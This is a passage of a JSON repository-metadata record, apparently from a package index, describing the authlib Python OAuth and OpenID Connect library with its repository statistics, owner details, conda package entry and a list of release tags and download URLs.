{"id":369010,"url":"https://github.com/authlib/authlib","last_synced_at":"2026-06-19T23:01:34.581Z","repository":{"id":37896804,"uuid":"108510280","full_name":"authlib/authlib","owner":"authlib","description":"The ultimate Python library in building OAuth, OpenID Connect clients and servers. JWS, JWE, JWK, JWA, JWT included.","archived":false,"fork":false,"pushed_at":"2026-05-21T03:20:51.000Z","size":3985,"stargazers_count":5343,"open_issues_count":140,"forks_count":539,"subscribers_count":56,"default_branch":"main","last_synced_at":"2026-06-13T00:30:51.074Z","etag":null,"topics":["django","flask","jose","jwe","jwk","jws","jwt","oauth","oauth2","oauth2-provider","oauth2-server","oidc","openid-connect"],"latest_commit_sha":null,"homepage":"https://authlib.org","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-3-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/authlib.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["authlib","lepture"]}},"created_at":"2017-10-27T06:52:26.000Z","updated_at":"2026-06-12T14:17:43.000Z","dependencies_parsed_at":"2024-02-28T02:49:54.296Z","dependency_job_id":"a5134a6e-41ed-4757-948f-b02d6a5a284f","html_url":"https://github.com/authlib/authlib","commit_stats":{"total_commits":1301,"total_committers":125,"mean_commits":10.408,"dds":"0.14604150653343584","last_synced_commit":"fe12a578854fb64c8a3906676ba7d2a2b9579459"},"previous_names":["authlib/authlib"],"tags_count":54,"template":false,"template_full_name":null,"purl":"pkg:github/authlib/authlib","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/authlib","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":34291110,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-26T15:22:16.424Z","status":"online","status_checked_at":"2026-06-13T02:00:06.617Z","response_time":62,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"owner":{"login":"authlib","name":"Authlib","uuid":"32964472","kind":"organization","description":"The ultimate Python library in building OAuth and OpenID Connect servers.","email":null,"website":"https://authlib.org/","location":"Japan","twitter":"authlib","company":null,"icon_url":"https://avatars.githubusercontent.com/u/32964472?v=4","repositories_count":12,"last_synced_at":"2026-04-03T07:12:35.268Z","metadata":{"has_sponsors_listing":true,"funding":{"github":["authlib","lepture"]}},"html_url":"https://github.com/authlib","funding_links":["https://github.com/sponsors/authlib","https://github.com/sponsors/lepture"],"total_stars":6979,"followers":74,"following":0,"created_at":"2022-11-06T14:13:52.360Z","updated_at":"2026-04-03T07:12:35.268Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/authlib","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/authlib/repositories"},"packages":[{"id":5285154,"name":"authlib","ecosystem":"conda","description":"The ultimate Python library in building OAuth and OpenID Connect servers. It is designed from low level specifications implementations to high level frameworks integrations, to meet the needs of everyone.","homepage":"https://authlib.org","licenses":"BSD-3-Clause","normalized_licenses":["BSD-3-Clause"],"repository_url":"https://github.com/authlib/authlib","keywords_array":[],"namespace":null,"versions_count":14,"first_release_published_at":"2020-10-06T16:06:36.000Z","latest_release_published_at":"2026-06-08T22:14:27.000Z","latest_release_number":"1.7.2","last_synced_at":"2026-06-08T23:03:57.523Z","created_at":"2022-10-03T15:42:10.563Z","updated_at":"2026-06-08T23:04:00.646Z","registry_url":"https://anaconda.org/anaconda/authlib","install_command":"conda install -c anaconda authlib","documentation_url":null,"metadata":{},"repo_metadata":{"id":37896804,"uuid":"108510280","full_name":"authlib/authlib","owner":"authlib","description":"The ultimate Python library in building OAuth, OpenID Connect clients and servers. JWS, JWE, JWK, JWA, JWT included.","archived":false,"fork":false,"pushed_at":"2026-05-21T03:20:51.000Z","size":3985,"stargazers_count":5332,"open_issues_count":139,"forks_count":540,"subscribers_count":56,"default_branch":"main","last_synced_at":"2026-06-05T22:21:17.501Z","etag":null,"topics":["django","flask","jose","jwe","jwk","jws","jwt","oauth","oauth2","oauth2-provider","oauth2-server","oidc","openid-connect"],"latest_commit_sha":null,"homepage":"https://authlib.org","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-3-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/authlib.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["authlib","lepture"]}},"created_at":"2017-10-27T06:52:26.000Z","updated_at":"2026-06-05T04:48:31.000Z","dependencies_parsed_at":"2024-02-28T02:49:54.296Z","dependency_job_id":"a5134a6e-41ed-4757-948f-b02d6a5a284f","html_url":"https://github.com/authlib/authlib","commit_stats":{"total_commits":1301,"total_committers":125,"mean_commits":10.408,"dds":"0.14604150653343584","last_synced_commit":"fe12a578854fb64c8a3906676ba7d2a2b9579459"},"previous_names":["authlib/authlib"],"tags_count":54,"template":false,"template_full_name":null,"purl":"pkg:github/authlib/authlib","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/authlib","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":34083848,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-26T15:22:16.424Z","status":"online","status_checked_at":"2026-06-08T02:00:07.615Z","response_time":111,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"authlib","name":"Authlib","uuid":"32964472","kind":"organization","description":"The ultimate Python library in building OAuth and OpenID Connect servers.","email":null,"website":"https://authlib.org/","location":"Japan","twitter":"authlib","company":null,"icon_url":"https://avatars.githubusercontent.com/u/32964472?v=4","repositories_count":12,"last_synced_at":"2026-04-03T07:12:35.268Z","metadata":{"has_sponsors_listing":true,"funding":{"github":["authlib","lepture"]}},"html_url":"https://github.com/authlib","funding_links":["https://github.com/sponsors/authlib","https://github.com/sponsors/lepture"],"total_stars":6979,"followers":74,"following":0,"created_at":"2022-11-06T14:13:52.360Z","updated_at":"2026-04-03T07:12:35.268Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/authlib","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/authlib/repositories"},"tags":[{"name":"v1.7.0","sha":"5d2e603ec5f10bd2c4bf20e2495c076370d65b74","kind":"commit","published_at":"2026-04-18T10:59:19.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.7.0","html_url":"https://github.com/authlib/authlib/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.7.0/manifests"},{"name":"v1.6.11","sha":"0dc0e5b4dc84f155319518a3732113af6fa47525","kind":"tag","published_at":"2026-04-16T07:18:05.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.6.11","html_url":"https://github.com/authlib/authlib/releases/tag/v1.6.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.6.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.11/manifests"},{"name":"v1.6.10","sha":"ef09aebbba4439dedb22bd15777d1b3458b6f0ab","kind":"commit","published_at":"2026-04-13T13:29:14.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.6.10","html_url":"https://github.com/authlib/authlib/releases/tag/v1.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.10/manifests"},{"name":"v1.6.9","sha":"9266eaa2227ad7e21dc731b2a4a01909aabd934b","kind":"commit","published_at":"2026-03-02T07:42:53.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.6.9","html_url":"https://github.com/authlib/authlib/releases/tag/v1.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.9/manifests"},{"name":"v1.6.8","sha":"a769f343ae8d43236448e3e74445980861812e82","kind":"commit","published_at":"2026-02-14T04:01:10.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.6.8","html_url":"https://github.com/authlib/authlib/releases/tag/v1.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.8/manifests"},{"name":"v1.6.7","sha":"38e872a3f5b97d2658507acc8762a4e18adaa50e","kind":"commit","published_at":"2026-02-06T14:02:52.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.6.7","html_url":"https://github.com/authlib/authlib/releases/tag/v1.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.7/manifests"},{"name":"v1.6.6","sha":"bb7a315befbad333faf9a23ef574d6e3134a6774","kind":"commit","published_at":"2025-12-12T07:59:43.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.6.6","html_url":"https://github.com/authlib/authlib/releases/tag/v1.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.6/manifests"},{"name":"v1.6.5","sha":"9ec42561cd1a81b518598d252f8adbcf446f7419","kind":"commit","published_at":"2025-10-02T13:31:28.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.6.5","html_url":"https://github.com/authlib/authlib/releases/tag/v1.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.5/manifests"},{"name":"v1.6.4","sha":"09a51855747c13771a74958e233a6bf1fd143741","kind":"commit","published_at":"2025-09-17T09:58:16.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.6.4","html_url":"https://github.com/authlib/authlib/releases/tag/v1.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.4/manifests"},{"name":"v1.6.3","sha":"dbbfa9abcfe725001b452cf08d9e48be0ebfdce9","kind":"tag","published_at":"2025-08-26T12:04:43.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.6.3","html_url":"https://github.com/authlib/authlib/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.3/manifests"},{"name":"v1.6.2","sha":"3385fbf804f0c32ccfadf21611cf893aabc1b0c0","kind":"tag","published_at":"2025-08-23T08:28:25.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.6.2","html_url":"https://github.com/authlib/authlib/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.2/manifests"},{"name":"v1.6.1","sha":"ef3d5733198570b8cff7a0b4f41988cfe9cf2b69","kind":"commit","published_at":"2025-07-20T07:37:14.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.6.1","html_url":"https://github.com/authlib/authlib/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.1/manifests"},{"name":"v1.6.0","sha":"fe87a117f941975793bf4063e9b08b90e88b230a","kind":"tag","published_at":"2025-05-22T12:58:35.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.6.0","html_url":"https://github.com/authlib/authlib/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.0/manifests"},{"name":"v1.5.2","sha":"fb698d796e4b39fd1bbfd008181bfa8cea33c67b","kind":"tag","published_at":"2025-04-02T10:30:34.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.5.2","html_url":"https://github.com/authlib/authlib/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"4eafdc21891e78361f478479efe109ff0fb2f661","kind":"tag","published_at":"2025-02-28T14:43:15.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.5.1","html_url":"https://github.com/authlib/authlib/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"2d0396e3fc49d53ab816bb43ec83fe42d527ca09","kind":"tag","published_at":"2025-02-25T09:53:21.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.5.0","html_url":"https://github.com/authlib/authlib/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.5.0/manifests"},{"name":"v1.4.1","sha":"0e8f480e9c9a91ab3dc8017de70f59014e66664d","kind":"commit","published_at":"2025-01-28T13:04:22.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.4.1","html_url":"https://github.com/authlib/authlib/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"eb34edfc8b1fdaae51a91d4686ebb34395e5082c","kind":"commit","published_at":"2024-12-20T07:26:03.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.4.0","html_url":"https://github.com/authlib/authlib/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.4.0/manifests"},{"name":"v1.3.2","sha":"d7db2c33226983648b91e3ec0d9cf2e43dc480d4","kind":"commit","published_at":"2024-08-24T05:08:50.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.3.2","html_url":"https://github.com/authlib/authlib/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.3.2/manifests"},{"name":"v1.3.1","sha":"df226ab587c453029ef5083a7e1c5dc6772647dd","kind":"commit","published_at":"2024-06-04T02:38:10.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.3.1","html_url":"https://github.com/authlib/authlib/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.3.1/manifests"},{"name":"v1.3.0","sha":"a7d68b4c3b8a3a7fe0b62943b5228669f2f3dfec","kind":"commit","published_at":"2023-12-17T07:55:15.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.3.0","html_url":"https://github.com/authlib/authlib/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"a18d0a5ad183eb58b4db7479f3f7da71398a8667","kind":"commit","published_at":"2023-06-25T12:52:53.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.2.1","html_url":"https://github.com/authlib/authlib/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"7575ea336c58ff3d206a62a94f1c01a0e594cba4","kind":"commit","published_at":"2022-12-06T08:34:02.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.2.0","html_url":"https://github.com/authlib/authlib/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.2.0/manifests"},{"name":"v0.15.6","sha":"0694276d9d9ec66b3d1db8d147f1c2afa4e30483","kind":"commit","published_at":"2022-11-01T12:54:52.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.15.6","html_url":"https://github.com/authlib/authlib/releases/tag/v0.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.15.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.6/manifests"},{"name":"v1.1.0","sha":"2a8a22630f098b276a535c30b628380f0a9646b1","kind":"commit","published_at":"2022-09-09T16:10:07.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.1.0","html_url":"https://github.com/authlib/authlib/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.1.0/manifests"},{"name":"v1.0.1","sha":"2e721aa0c158f7d7bac96bc75f7c6d31a939007d","kind":"commit","published_at":"2022-04-06T11:52:43.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.0.1","html_url":"https://github.com/authlib/authlib/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"c73e2a8921a15ee1f96b604123e49bd2d5fd651b","kind":"commit","published_at":"2022-03-15T10:10:57.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.0.0","html_url":"https://github.com/authlib/authlib/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.0.0/manifests"},{"name":"v0.15.5","sha":"d8e428c9350c792fc3d25dbaaffa3bfefaabd8e3","kind":"commit","published_at":"2021-10-18T12:08:43.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.15.5","html_url":"https://github.com/authlib/authlib/releases/tag/v0.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.15.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.5/manifests"},{"name":"v0.15.4","sha":"45701441996b18452523105112d018c0f5f43a18","kind":"commit","published_at":"2021-06-05T07:07:38.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.15.4","html_url":"https://github.com/authlib/authlib/releases/tag/v0.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.4/manifests"},{"name":"v0.15.3","sha":"33aab0272d7c8a857c851f49a32c6d374930549a","kind":"commit","published_at":"2021-01-15T13:51:55.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.15.3","html_url":"https://github.com/authlib/authlib/releases/tag/v0.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.3/manifests"},{"name":"v0.15.2","sha":"1969b567733f6426e5a8e20c5edf3371e9d23e5c","kind":"commit","published_at":"2020-10-18T06:35:01.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.15.2","html_url":"https://github.com/authlib/authlib/releases/tag/v0.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.2/manifests"},{"name":"v0.15.1","sha":"c70a805145db56a0909d583bdb70773732578c68","kind":"commit","published_at":"2020-10-14T12:56:02.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.15.1","html_url":"https://github.com/authlib/authlib/releases/tag/v0.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.1/manifests"},{"name":"v0.15","sha":"4e501ce3e58e2daaaba0b82018b047bb61741f0c","kind":"commit","published_at":"2020-10-10T06:53:45.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.15","html_url":"https://github.com/authlib/authlib/releases/tag/v0.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15/manifest